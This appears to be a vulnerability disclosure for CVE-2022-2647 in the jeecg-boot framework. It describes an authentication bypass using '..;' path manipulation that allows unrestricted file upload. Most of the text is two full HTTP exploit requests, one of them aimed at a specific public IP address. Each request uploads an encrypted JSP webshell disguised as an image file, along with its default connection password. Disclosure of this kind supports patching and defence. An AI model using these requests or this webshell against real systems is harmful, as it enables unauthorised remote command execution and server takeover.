Headline
CVE-2022-2647: Jeecg-boot Remote command execution - J0o1ey
A vulnerability was found in jeecg-boot. It has been declared as critical. This vulnerability affects unknown code of the file /api/. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205594 is the identifier assigned to this vulnerability.
Summary
In jeecg boot framework (https://github.com/jeecgboot/jeecg-boot),
There is a vuln that can access the API of file upload by bypassing Shiro’s permission authentication to realize webshell upload.
Details are as followed
Details
HTTP Request
POST /api/..;/cgUploadController.do?ajaxSaveFile&sessionId=7211DABCDAF4D0AAB731C44848F0FB6C%27, HTTP/1.1
Host: ip
Content-Length: 902
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTneEAOeZrAbfrMH4
Accept: */*
Origin: http://ip
Referer: http://ip/api/..;/systemController.do?commonUpload&_=1655456862344
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7211DABCDAF4D0AAB731C44848F0FB6C; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655456211; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655456442
Connection: close
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="name"
skr.jsp
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="file"; filename="skr.jsp"
Content-Type: image/jpeg
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryTneEAOeZrAbfrMH4—
or also hacker can use this api
POST /api/..;/commonController.do?parserXml HTTP/1.1
Host: 218.12.79.196:8081
Content-Length: 424
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzAtM8p8Ho292J3Vk
Accept: */*
Origin: http://218.12.79.196:8081
Referer: http://218.12.79.196:8081/api/..;/systemController.do?commonUpload&_=1655435878184
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3D38F89CA6887B45CEFB41E4CA65A235; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655433472; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655435715
Connection: close
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="name"
per-index-photo.png
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="file"; filename="per-index-photo.jsp"
Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryzAtM8p8Ho292J3Vk--
The ability to upload arbitrary files leads to the final remote command execution